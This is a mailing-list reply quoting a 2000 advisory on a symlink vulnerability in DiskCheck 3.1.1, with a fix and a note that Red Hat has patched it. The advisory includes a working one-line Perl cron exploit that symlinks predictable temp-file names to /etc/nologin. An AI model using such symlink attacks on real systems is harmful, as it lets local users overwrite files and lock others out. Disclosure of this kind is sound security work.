Re: Diskcheck 3.1.1 Symlink Vulnerability

[Stan Bubrouski <secnet () CROSSWINDS NET>]

At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
> Diskcheck 3.1.1 Symlink Vulnerability
>
> 1 Introduction
>
> DiskCheck is a Perl script that monitors how much space is available
> on your hard drive.  Basically, it checks your drive space every
> hour and takes action based on the specifications in the config file
> /etc/diskcheck.conf.
>
> DiskCheck 3.1.1 is available from
> http://www.kaybee.org/~kirk/html/linux.html and
> RedHat Powertools 6.x.
>
> 2 Vulnerability
>
> The command, /etc/cron.hourly/diskcheck.pl is executed with root
> privilege
> every hour. It creates a temporary file, whose default name is
> /tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf,
> is predictable and is willing to follow symbolic links.  This may allow
> malicious local users to create or overwrite arbitrarily named files.
> 3 Exploit
>
> The following cron job creates the file, /etc/nologin.
>
> 0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
>    symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
>
> 4 Solution
>
> Relocate the temporary file into the directory where root only can
> create
> a file.
>
> Example)
>
> Edit /etc/diskcheck.conf
>
>  $tempfile = '/var/local/diskusagealert.txt'
>
> # ls -ld /var/local
> drwxr-xr-x   2 root     root         1024 Feb  7  1996 /var/local/
>
>
> You, Jin-Ho, jhyou () chonnam ac kr

This was reported on the list about a month ago and is fixed in Red Hat's
current rawhide,
and in Red Hat Pinstripe (7.0 beta).  I don't know of any other distros
that include it.

-Stan Bubrouski